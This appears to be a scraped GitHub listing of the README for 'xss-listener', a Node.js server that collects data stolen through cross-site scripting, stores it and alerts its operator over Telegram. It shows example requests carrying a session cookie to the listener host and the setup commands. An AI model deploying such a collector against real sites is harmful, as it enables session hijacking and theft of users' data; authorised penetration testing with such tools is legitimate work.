cagataycali / xss-listener
- вторник, 16 мая 2017 г. в 03:12:23
https://github.com/cagataycali/xss-listener
JavaScript
🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.
🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.
From now on, you do not need XSS listeners! XSS listener records the data you have stolen on the remote site in the database, and gives instant notification with telegram.
🕸️ Know-How Background
🕸️ Listener Usage
Listener accepts all HTTP methods with parameters, then save database. Example:
GET https://yourapp.com/?cookie=PHPSESSID=889c6594db2541db1666cefca7537373
or
POST https://yourapp.com/
Form: { cookie:'PHPSESSID=889c6594db2541db1666cefca7537373' }
You will notify by telegram bot.
🕸️ Detailed Usage
🕸️ List previous requests
🕸️ Delete previous request by id
https://yourapp.com/delete/[id]
🕸️ Even you can use telegram
/list
/delete [id]
🕸️ Run local environment
In terminal,
git clone https://github.com/cagataycali/xss-listener.git; # Clone
cd xss-listener; # Change directory.
npm install; # Install dependencies.
# Fill bot token and user id.
TELEGRAM_TOKEN=[BOT TOKEN] TELEGRAM_USER_ID=[USER ID] node index.jsLicense
MIT © Çağatay Çalı